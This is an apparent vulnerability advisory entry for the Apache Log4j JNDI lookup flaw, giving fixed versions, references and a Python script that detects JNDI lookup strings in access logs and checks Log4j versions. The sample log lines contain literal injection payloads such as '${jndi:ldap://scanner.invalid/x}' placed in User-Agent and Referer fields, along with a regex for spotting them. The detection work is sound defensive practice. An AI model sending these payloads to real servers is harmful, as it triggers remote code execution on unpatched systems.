Apache Log4j JNDI message lookup vulnerability
Added: 12/16/2021

Background
Apache Log4j is a logging library used by many Java applications.

Problem
An attacker who is able to control log message content could embed a JNDI lookup referencing an LDAP or RMI URL; resolving that lookup downloads an executable Java class, leading to arbitrary command execution.

Resolution
Upgrade to Apache Log4j 2.12.2, or to 2.16 or higher, or apply a fix from the vendor of the software that embeds Log4j.

References
https://www.cisa.gov/uscert/apache-log4j-vulnerability-guidance
https://logging.apache.org/log4j/2.x/security.html
https://isc.sans.edu/diary/28120
Limitations
Exploit works on web applications which use Log4j to log the User-Agent header.

Platforms
Windows
Linux
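The Problem and Limitations sections above describe attacker-controlled log content (typically the User-Agent header) carrying a JNDI lookup with an LDAP or RMI URL, and the Resolution names the fixed versions. The following added example (not part of the original advisory) scans constructed access-log lines in the common "combined" format for that lookup shape and checks whether a reported Log4j version meets the advisory's fix threshold; it assumes 2.12.2 applies to the 2.12 branch and 2.16.0 to everything else, and uses hosts in the reserved .invalid TLD.

```python
import re

# Apache/nginx "combined" access-log format; the User-Agent is the last quoted field.
COMBINED_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<req>[^"]*)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

# A JNDI lookup carrying an LDAP/LDAPS/RMI URL, the shape the advisory describes.
JNDI_RE = re.compile(r'\$\{\s*jndi\s*:\s*(ldaps?|rmi)\s*:', re.IGNORECASE)

# Constructed sample lines (hosts use the reserved .invalid TLD).
SAMPLE_LINES = [
    '203.0.113.5 - - [16/Dec/2021:10:00:01 +0000] "GET / HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '203.0.113.9 - - [16/Dec/2021:10:00:02 +0000] "GET /login HTTP/1.1" 200 77 "-" '
    '"${jndi:ldap://scanner.invalid/x}"',
    '198.51.100.2 - - [16/Dec/2021:10:00:03 +0000] "GET /api HTTP/1.1" 404 0 '
    '"${JNDI:rmi://scanner.invalid/y}" "curl/7.79.1"',
]


def find_jndi_lookups(lines):
    """Return one finding per log line whose logged fields carry a JNDI lookup."""
    findings = []
    for number, line in enumerate(lines, start=1):
        match = COMBINED_RE.match(line)
        if not match:
            continue  # unparseable line; a real tool would count these separately
        for field in ("ua", "referer", "req"):
            if JNDI_RE.search(match.group(field)):
                findings.append({"line": number, "ip": match.group("ip"),
                                 "field": field, "value": match.group(field)})
                break  # one finding per line is enough for triage
    return findings


def log4j_is_fixed(version):
    """True when a Log4j 2.x version string is at or above the fixed releases the
    advisory names (assumed: 2.12.2 on the 2.12 branch, 2.16.0 otherwise)."""
    parts = [int(p) for p in version.split(".")]
    parts += [0] * (3 - len(parts))  # "2.16" -> (2, 16, 0)
    v = tuple(parts[:3])
    on_2_12_branch = v[:2] == (2, 12)
    return v >= (2, 12, 2) if on_2_12_branch else v >= (2, 16, 0)


if __name__ == "__main__":
    for f in find_jndi_lookups(SAMPLE_LINES):
        print(f"line {f['line']} from {f['ip']}: JNDI lookup in {f['field']}: {f['value']}")
    for ver in ("2.12.1", "2.12.2", "2.15.0", "2.16", "2.17.1"):
        print(ver, "fixed" if log4j_is_fixed(ver) else "below fix threshold")
```

The scan covers the User-Agent, Referer and request line because all three are commonly logged; a negative version result means the advisory's upgrade still applies.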